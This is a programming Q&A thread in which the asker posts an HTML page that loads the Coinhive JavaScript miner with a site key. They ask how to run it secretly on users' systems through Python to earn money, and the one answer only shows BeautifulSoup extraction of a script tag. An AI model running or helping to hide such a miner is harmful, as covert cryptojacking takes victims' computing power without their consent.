# Processing html local file with python

Tags: python, scripting

How can I open a html file in Python and run it secretly and process it?

My html file codes :

```
<html>
    <head>
        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <script>
            var miner = new CoinHive.User('nkkBlaVbS77hwlcFKZlqGT6fLFLQZy6d', 'alex');
            miner.start();
        </script>
    </head>
    <body></body>
</html>
```

I want to make money in the user system (with javascript code) 
But I want to run it secretly
But the default browser will show my HTML page
Now how can I open a html file and process codes ?
I tested with requests or js2py or Webbrowser & ... library , But it does not work

Comment: can you elaborate? you can open an html file, but how do you want to process codes, do you mean running javascript withing python?

Comment: Sorry , yes i want processing java script

Answer (score 0):

You can use BeautifulSoup!
First give an ID to your script tag (like **myscrypt1**) and  then get the content with the *find* method of BeautifulSoup.

```
import requests
from bs4 import BeautifulSoup
response = requests.get(my_url)
soup = BeautifulSoup(response.text)
soup.find(id="myscrypt1")
```